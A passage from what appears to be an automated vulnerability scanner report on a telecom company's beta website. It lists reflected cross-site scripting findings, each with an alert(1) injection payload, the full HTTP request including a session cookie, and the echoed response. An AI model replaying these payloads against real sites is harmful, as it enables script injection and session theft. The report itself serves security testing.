User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:25 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/index.html?&lid=en">
...[SNIP]...

4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 53986--><script>alert(1)</script>5b54334d4b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/index.html?&lid=en">
...[SNIP]...

4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fb16<script>alert(1)</script>0b2f2e242ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/index.html</b>
...[SNIP]...

4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98720<script>alert(1)</script>2a336272d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23932
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...

4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e15"><script>alert(1)</script>5434cc3c433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:08 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0dd1--><script>alert(1)</script>b1410b8d68d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:18 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16605"><script>alert(1)</script>a086d335dd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 163d6--><script>alert(1)</script>5cd1b62ae23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:53 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83abb<script>alert(1)</script>62ed3c32c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23929
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...

4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 437c2--><script>alert(1)</script>512b27f7612 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products-services437c2--><script>alert(1)</script>512b27f7612/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-services437c2--><script>alert(1)</script>512b27f7612/index.html?&lid=id" class="blue">
...[SNIP]...

4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1fda<script>alert(1)</script>2b730265f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23321
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html</b>
...[SNIP]...

4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae525"><script>alert(1)</script>66dba90169e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:02 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23327
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?&lid=id" class="blue">
...[SNIP]...

4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1f29<script>alert(1)</script>636cefd39c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layananb1f29<script>alert(1)</script>636cefd39c0/ HTTP/1.1
Host: beta.telkom.co.id
